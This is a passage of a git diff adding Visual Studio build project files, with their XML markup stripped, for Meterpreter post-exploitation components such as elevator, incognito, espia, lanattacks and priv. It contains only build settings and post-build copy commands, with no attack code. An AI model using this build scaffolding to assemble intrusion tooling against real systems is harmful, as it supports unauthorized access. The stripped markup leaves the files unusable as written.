+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}
+ Win32Proj
+ backcompat
+
+
+
+ StaticLibrary
+ true
+ Unicode
+
+
+ StaticLibrary
+ false
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+ AllRules.ruleset
+
+
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
+
+
+ Windows
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ false
+ true
+ WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+
+
+ Windows
+ true
+ true
+ true
+
+
+ true
+
+
+ Windows
+
+
+ 5.0
+
+
+ false
+ .\Release\backcompat.lib
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters
new file mode 100644
index 0000000000..831ce52c90
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Source Files
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user
new file mode 100644
index 0000000000..ace9a86acb
--- /dev/null
+++ b/external/source/meterpreter/workspace/backcompat/backcompat.vcxproj.user
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/common/common.vcxproj b/external/source/meterpreter/workspace/common/common.vcxproj
new file mode 100644
index 0000000000..36c7b2be81
--- /dev/null
+++ b/external/source/meterpreter/workspace/common/common.vcxproj
@@ -0,0 +1,326 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
+ common
+
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+ StaticLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ .\Release\
+ .\Release\
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ _DEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ common.h
+ .\Debug/common.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Debug\common.lib
+ true
+
+
+ true
+ .\Debug/common.bsc
+
+
+
+
+ X64
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ _DEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ common.h
+ .\Debug/common.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Debug\common.lib
+ true
+
+
+ true
+ .\Debug/common.bsc
+
+
+
+
+ MinSpace
+ Default
+ Size
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ common.h
+ .\Release/common.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Release\common.lib
+ true
+ Windows
+ 5.0
+
+
+ true
+ .\Release/common.bsc
+
+
+
+
+ X64
+
+
+ MinSpace
+ Default
+ Size
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_LIB;USE_DLL;METERPRETER_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Use
+ common.h
+ .\Release/common.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ .\Release\common.lib
+ true
+
+
+ true
+ .\Release/common.bsc
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/elevator/elevator.vcxproj b/external/source/meterpreter/workspace/elevator/elevator.vcxproj
new file mode 100644
index 0000000000..e968fac448
--- /dev/null
+++ b/external/source/meterpreter/workspace/elevator/elevator.vcxproj
@@ -0,0 +1,232 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {662AFBB3-F64A-4AD1-8956-B9F1B846231C}
+ elevator
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ true
+
+
+ Application
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ true
+
+
+ Application
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ true
+ Console
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ true
+ Console
+ MachineX64
+
+
+
+
+ MaxSpeed
+ true
+ WIN32;NDEBUG;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+ false
+
+
+ Level3
+ ProgramDatabase
+ StdCall
+ CompileAsC
+ false
+ false
+
+
+ .\Release\elevator.dll
+ elevator.def
+ %(DelayLoadDLLs)
+ false
+ Windows
+ true
+ true
+
+
+ false
+ false
+ MachineX86
+ 5.0
+ backcompat.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ ..\backcompat\Release;
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(ProjectDir)\release\elevator.dll"
+copy /y "$(ProjectDir)\release\elevator.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ WIN32;NDEBUG;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ MultiThreaded
+ false
+ false
+
+
+ Level3
+ ProgramDatabase
+ StdCall
+ CompileAsC
+
+
+ .\Release\elevator.x64.dll
+
+
+ %(DelayLoadDLLs)
+ false
+ Windows
+ true
+ true
+
+
+ false
+ false
+ MachineX64
+
+
+ copy /y "$(ProjectDir)\release\elevator.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj b/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj
new file mode 100644
index 0000000000..8095089d8d
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_boiler/ext_server_boiler.vcxproj
@@ -0,0 +1,238 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {488BE203-8407-42D1-B334-8B5C3BC5AB3E}
+ ext_server_boiler
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ ..\metsrv\Release;%(AdditionalLibraryDirectories)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MaxSpeed
+ true
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_boiler.dll
+ ..\backcompat\Release;..\metsrv\Release; ;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_boiler.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_boiler.lib
+ MachineX86
+ 5.0
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ ..\metsrv\Release;%(AdditionalLibraryDirectories)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BOILER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_boiler.dll
+ ..\metsrv\Release; ;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_boiler.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_boiler.lib
+ MachineX64
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
new file mode 100644
index 0000000000..9569859ea7
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
@@ -0,0 +1,266 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}
+ ext_server_espia
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;jpeg.lib;%(AdditionalDependencies)
+ .\Release/ext_server_espia.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+ false
+ %(IgnoreSpecificDefaultLibraries)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_espia.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_espia.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_espia.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;jpeg.lib;%(AdditionalDependencies)
+ .\Release\ext_server_espia.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;..\..\source\jpeg-8\lib\win\x64;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_espia.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_espia.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_espia.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj
new file mode 100644
index 0000000000..ce301dec39
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj
@@ -0,0 +1,253 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {C427F6B9-C287-4BDA-A5BB-401FC19E207C}
+ ext_server_incognito
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_incognito.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_incognito.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_incognito.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_incognito.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\incognito;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_incognito.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_incognito.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_incognito.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_incognito.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj
new file mode 100644
index 0000000000..f8f55426c4
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj
@@ -0,0 +1,256 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}
+ ext_server_lanattacks
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX86
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ netapi32.lib mpr.lib %(AdditionalOptions)
+ true
+ Windows
+ MachineX64
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ backcompat.lib;Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release/ext_server_lanattacks.dll
+ ..\backcompat\Release;..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_lanattacks.map
+ Windows
+
+
+
+
+ false
+
+
+ .\Release/ext_server_lanattacks.lib
+ MachineX86
+ false
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\ext_server_lanattacks.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ false
+ ..\..\source\extensions\lanattacks;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ ProgramDatabase
+ false
+
+
+ Netapi32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)
+ .\Release\ext_server_lanattacks.x64.dll
+ ..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ metsrv.dll;%(DelayLoadDLLs)
+ false
+ true
+ .\Release/ext_server_lanattacks.map
+ NotSet
+
+
+
+
+ false
+
+
+ .\Release/ext_server_lanattacks.lib
+ MachineX64
+ false
+
+
+
+
+ copy /y "$(ProjectDir)\release\ext_server_lanattacks.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
new file mode 100644
index 0000000000..86e77ecce6
--- /dev/null
+++ b/external/source/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj
@@ -0,0 +1,380 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {87C64204-C82F-415D-AF45-D0B33BDFE39A}
+ ext_server_priv
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/ext_server_priv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
